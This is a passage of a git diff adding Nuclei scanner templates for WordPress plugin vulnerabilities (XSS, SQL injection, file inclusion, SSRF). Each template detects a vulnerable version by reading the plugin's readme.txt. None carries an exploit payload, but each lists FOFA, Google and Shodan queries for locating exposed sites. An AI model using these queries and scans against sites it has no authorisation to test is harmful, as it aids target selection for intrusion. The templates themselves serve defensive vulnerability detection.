"{{BaseURL}}/wp-content/plugins/wp-admin-ui-customize/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-admin-ui-customize" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.13') \ No newline at end of file diff --git a/poc/cve/CVE-2024-53725.yaml b/poc/cve/CVE-2024-53725.yaml new file mode 100644 index 0000000000..766c5970a3 --- /dev/null +++ b/poc/cve/CVE-2024-53725.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-53725-b1549800e4f49f80a8abddc499383424 + +info: + name: > + Post Hits Counter <= 2.8.23 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Post Hits Counter plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 2.8.23 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/746bf178-5e1b-4f1a-8072-d0c1be005f88?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-53725 + metadata: + fofa-query: "wp-content/plugins/hits-counter/" + google-query: inurl:"/wp-content/plugins/hits-counter/" + shodan-query: 'vuln:CVE-2024-53725' + tags: cve,wordpress,wp-plugin,hits-counter,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/hits-counter/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "hits-counter" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.23') \ No newline at end of file diff --git a/poc/cve/CVE-2024-53729.yaml b/poc/cve/CVE-2024-53729.yaml new file mode 100644 index 0000000000..821dd75678 --- /dev/null +++ b/poc/cve/CVE-2024-53729.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-53729-792d23502d5d4d568b4da98319a2bf83 + +info: + name: > + Blizzard Quotes <= 1.3 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Blizzard Quotes plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/06d4a12c-9503-4e89-85e7-64838a42dc28?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-53729 + metadata: + fofa-query: "wp-content/plugins/blizzard-quotes/" + google-query: inurl:"/wp-content/plugins/blizzard-quotes/" + shodan-query: 'vuln:CVE-2024-53729' + tags: cve,wordpress,wp-plugin,blizzard-quotes,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/blizzard-quotes/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "blizzard-quotes" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-53737.yaml b/poc/cve/CVE-2024-53737.yaml new file mode 100644 index 0000000000..44b8ddb8f6 --- /dev/null +++ b/poc/cve/CVE-2024-53737.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-53737-d75fb3be3b1507d8a5102b9146c5ac69 + +info: + name: > + WP Mailster <= 1.8.16.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The WP Mailster plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.8.16.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e451df35-8448-4791-859e-969dc97a1aa8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-53737 + metadata: + fofa-query: "wp-content/plugins/wp-mailster/" + google-query: inurl:"/wp-content/plugins/wp-mailster/" + shodan-query: 'vuln:CVE-2024-53737' + tags: cve,wordpress,wp-plugin,wp-mailster,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-mailster/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-mailster" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.16.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-53738.yaml b/poc/cve/CVE-2024-53738.yaml new file mode 100644 index 0000000000..5f4c25e3f3 --- /dev/null +++ b/poc/cve/CVE-2024-53738.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-53738-f9b4da473884d91136fd1add1208b51e + +info: + name: > + Asset CleanUp: Page Speed Booster <= 1.3.9.8 - Authenticated (Admin+) Server-Side Request Forgery + author: topscoder + severity: low + description: > + The Asset CleanUp: Page Speed Booster plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.3.9.8. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5617f917-ecb5-4c64-b421-e4af14c17eb7?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 5.5 + cve-id: CVE-2024-53738 + metadata: + fofa-query: "wp-content/plugins/wp-asset-clean-up/" + google-query: inurl:"/wp-content/plugins/wp-asset-clean-up/" + shodan-query: 'vuln:CVE-2024-53738' + tags: cve,wordpress,wp-plugin,wp-asset-clean-up,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-asset-clean-up/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-asset-clean-up" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.9.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-53739.yaml b/poc/cve/CVE-2024-53739.yaml new file mode 100644 index 0000000000..9aecf1b47a --- /dev/null +++ b/poc/cve/CVE-2024-53739.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-53739-245349b994f894d211d92e07e7132e02 + +info: + name: > + Cryptocurrency Widgets For Elementor <= 1.6.4 - Unauthenticated Local File Inclusion + author: topscoder + severity: critical + description: > + The Cryptocurrency Widgets For Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.6.4. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f4723aef-f248-47aa-b53b-ed1ab189bf2c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2024-53739 + metadata: + fofa-query: "wp-content/plugins/cryptocurrency-widgets-for-elementor/" + google-query: inurl:"/wp-content/plugins/cryptocurrency-widgets-for-elementor/" + shodan-query: 'vuln:CVE-2024-53739' + tags: cve,wordpress,wp-plugin,cryptocurrency-widgets-for-elementor,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cryptocurrency-widgets-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cryptocurrency-widgets-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.6.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-53803.yaml b/poc/cve/CVE-2024-53803.yaml new file mode 100644 index 0000000000..29e63d7726 --- /dev/null +++ b/poc/cve/CVE-2024-53803.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-53803-7c065e8dc8daf36d5150824cdcc9233f + +info: + name: > + WP Mailster <= 1.8.16.0 - Missing Authorization + author: topscoder + severity: low + description: > + The WP Mailster plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.8.16.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/900cfb6d-61c8-4696-9a5d-1ff03cd76a22?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H + cvss-score: 6.5 + cve-id: CVE-2024-53803 + metadata: + fofa-query: "wp-content/plugins/wp-mailster/" + google-query: inurl:"/wp-content/plugins/wp-mailster/" + shodan-query: 'vuln:CVE-2024-53803' + tags: cve,wordpress,wp-plugin,wp-mailster,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-mailster/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-mailster" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.16.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-53804.yaml b/poc/cve/CVE-2024-53804.yaml new file mode 100644 index 0000000000..c65bb043ac --- /dev/null +++ b/poc/cve/CVE-2024-53804.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-53804-7f7eb1b52516912e3dcbd3b07c0abf16 + +info: + name: > + WP Mailster <= 1.8.16.0 - Unauthenticated Information Exposure + author: topscoder + severity: medium + description: > + The WP Mailster plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.8.16.0. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e31ecd7e-95ea-4a35-ae6d-ad3c61b1cae9?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-53804 + metadata: + fofa-query: "wp-content/plugins/wp-mailster/" + google-query: inurl:"/wp-content/plugins/wp-mailster/" + shodan-query: 'vuln:CVE-2024-53804' + tags: cve,wordpress,wp-plugin,wp-mailster,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-mailster/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-mailster" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.16.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-53805.yaml b/poc/cve/CVE-2024-53805.yaml new file mode 100644 index 0000000000..36f849bbf1 --- /dev/null +++ b/poc/cve/CVE-2024-53805.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-53805-36ba7e73c93e1a24c1943bbb34e10a80 + +info: + name: > + WP Mailster <= 1.8.16.0 - Missing Authorization + author: topscoder + severity: high + description: > + The WP Mailster plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.8.16.0. This makes it possible for unauthenticated attackers to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/697105e6-3155-4199-9fee-914830674023?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.5 + cve-id: CVE-2024-53805 + metadata: + fofa-query: "wp-content/plugins/wp-mailster/" + google-query: inurl:"/wp-content/plugins/wp-mailster/" + shodan-query: 'vuln:CVE-2024-53805' + tags: cve,wordpress,wp-plugin,wp-mailster,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-mailster/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-mailster" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.16.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-53807.yaml b/poc/cve/CVE-2024-53807.yaml new file mode 100644 index 0000000000..b21045cc2a --- /dev/null +++ b/poc/cve/CVE-2024-53807.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-53807-b4800b9f2218096c453e2fb7ff8deaba + +info: + name: > + WP Mailster <= 1.8.16.0 - Authenticated (Contributor+) SQL Injection via orderby + author: topscoder + severity: low + description: > + The WP Mailster plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.8.16.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9baf0a14-600b-4c0e-9121-71c28653e530?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-53807 + metadata: + fofa-query: "wp-content/plugins/wp-mailster/" + google-query: inurl:"/wp-content/plugins/wp-mailster/" + shodan-query: 'vuln:CVE-2024-53807' + tags: cve,wordpress,wp-plugin,wp-mailster,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-mailster/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-mailster" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.16.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-53808.yaml b/poc/cve/CVE-2024-53808.yaml new file mode 100644 index 0000000000..64cf087f99 --- /dev/null +++ b/poc/cve/CVE-2024-53808.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-53808-734202edafa17e1da99062a92085d7fe + +info: + name: > + NEX-Forms – Ultimate Form Builder <= 8.7.8 - Authenticated (Administrator+) SQL Injection + author: topscoder + severity: low + description: > + The NEX-Forms – Ultimate Form Builder plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 8.7.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5f0406ad-8f4e-49a2-87dd-a6e319904652?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N + cvss-score: 4.9 + cve-id: CVE-2024-53808 + metadata: + fofa-query: "wp-content/plugins/nex-forms-express-wp-form-builder/" + google-query: inurl:"/wp-content/plugins/nex-forms-express-wp-form-builder/" + shodan-query: 'vuln:CVE-2024-53808' + tags: cve,wordpress,wp-plugin,nex-forms-express-wp-form-builder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/nex-forms-express-wp-form-builder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "nex-forms-express-wp-form-builder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 8.7.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-53812.yaml b/poc/cve/CVE-2024-53812.yaml new file mode 100644 index 0000000000..e915e4a16d --- /dev/null +++ b/poc/cve/CVE-2024-53812.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-53812-f7722f28837f9ffee33d0d19cbdc6579 + +info: + name: > + WP GeoNames <= 1.8 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The WP GeoNames plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0fb13522-95d7-428a-bbc6-e278f814e863?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-53812 + metadata: + fofa-query: "wp-content/plugins/wp-geonames/" + google-query: inurl:"/wp-content/plugins/wp-geonames/" + shodan-query: 'vuln:CVE-2024-53812' + tags: cve,wordpress,wp-plugin,wp-geonames,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-geonames/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-geonames" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-53815.yaml b/poc/cve/CVE-2024-53815.yaml new file mode 100644 index 0000000000..335311395c --- /dev/null +++ b/poc/cve/CVE-2024-53815.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-53815-2e40699b6c5f7ad5936edd6b07104f72 + +info: + name: > + Pinpoint Booking System <= 2.9.9.5.1 - Authenticated (Subscriber+) SQL Injection + author: topscoder + severity: low + description: > + The Pinpoint Booking System plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 2.9.9.5.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f673e463-5ef0-4704-91a1-76e375df9d1c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2024-53815 + metadata: + fofa-query: "wp-content/plugins/booking-system/" + google-query: inurl:"/wp-content/plugins/booking-system/" + shodan-query: 'vuln:CVE-2024-53815' + tags: cve,wordpress,wp-plugin,booking-system,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/booking-system/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "booking-system" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.9.9.5.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-53817.yaml b/poc/cve/CVE-2024-53817.yaml new file mode 100644 index 0000000000..050d5c0f12 --- /dev/null +++ b/poc/cve/CVE-2024-53817.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-53817-c6b5a8cf44ad040cab396afbb639a133 + +info: + name: > + Product Labels For Woocommerce <= 1.5.8 - Authenticated (Administrator+) SQL Injection + author: topscoder + severity: low + description: > + The Product Labels For Woocommerce plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.5.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/fcbe5bfa-7680-452e-bb18-ea9fbbb07b8e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N + cvss-score: 4.9 + cve-id: CVE-2024-53817 + metadata: + fofa-query: "wp-content/plugins/aco-product-labels-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/aco-product-labels-for-woocommerce/" + shodan-query: 'vuln:CVE-2024-53817' + tags: cve,wordpress,wp-plugin,aco-product-labels-for-woocommerce,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/aco-product-labels-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "aco-product-labels-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-53818.yaml b/poc/cve/CVE-2024-53818.yaml new file mode 100644 index 0000000000..a5fcc1d0ad --- /dev/null +++ b/poc/cve/CVE-2024-53818.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-53818-7859a96404bfca0d2fce23fb1104c8ba + +info: + name: > + PostX <= 4.1.15 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The PostX plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 4.1.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/af55ea6c-01f6-4c87-91bb-a0ff98e92256?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-53818 + metadata: + fofa-query: "wp-content/plugins/ultimate-post/" + google-query: inurl:"/wp-content/plugins/ultimate-post/" + shodan-query: 'vuln:CVE-2024-53818' + tags: cve,wordpress,wp-plugin,ultimate-post,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ultimate-post/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ultimate-post" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.15') \ No newline at end of file diff --git a/poc/cve/CVE-2024-53819.yaml b/poc/cve/CVE-2024-53819.yaml new file mode 100644 index 0000000000..36fdaf3a9f --- /dev/null +++ b/poc/cve/CVE-2024-53819.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-53819-ed57d3a9059f066ad18459455b0d7bd1 + +info: + name: > + Client Invoicing by Sprout Invoices <= 20.8.0 - Insecure Direct Object Reference + author: topscoder + severity: medium + description: > + The Client Invoicing by Sprout Invoices – Easy Estimates and Invoices for WordPress plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 20.8.0 due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to act on objects they shouldn't be able to manipulate. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/326e168d-c2ae-485f-93ff-ed59d5b6061e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-53819 + metadata: + fofa-query: "wp-content/plugins/sprout-invoices/" + google-query: inurl:"/wp-content/plugins/sprout-invoices/" + shodan-query: 'vuln:CVE-2024-53819' + tags: cve,wordpress,wp-plugin,sprout-invoices,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/sprout-invoices/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "sprout-invoices" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 20.8.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-53823.yaml b/poc/cve/CVE-2024-53823.yaml new file mode 100644 index 0000000000..a803c31cb1 --- /dev/null +++ b/poc/cve/CVE-2024-53823.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-53823-ec6e0f4eab04b9728e4dde6ee13b9ace + +info: + name: > + The Plus Addons for Elementor Page Builder Lite <= 5.6.14 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The The Plus Addons for Elementor Page Builder Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 5.6.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e30c6a24-1ec8-4816-b467-c1122b9a8ce1?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-53823 + metadata: + fofa-query: "wp-content/plugins/the-plus-addons-for-elementor-page-builder/" + google-query: inurl:"/wp-content/plugins/the-plus-addons-for-elementor-page-builder/" + shodan-query: 'vuln:CVE-2024-53823' + tags: cve,wordpress,wp-plugin,the-plus-addons-for-elementor-page-builder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/the-plus-addons-for-elementor-page-builder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "the-plus-addons-for-elementor-page-builder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.6.14') \ No newline at end of file diff --git a/poc/cve/CVE-2024-53824.yaml b/poc/cve/CVE-2024-53824.yaml new file mode 100644 index 0000000000..e7b5338711 --- /dev/null +++ b/poc/cve/CVE-2024-53824.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-53824-6175e1733e3397fffa8fe7b047e94e55 + +info: + name: > + All Bootstrap Blocks <= 1.3.19 - Authenticated (Contributor+) Local File Inclusion + author: topscoder + severity: low + description: > + The All Bootstrap Blocks plugin for WordPress is vulnerable to Local File 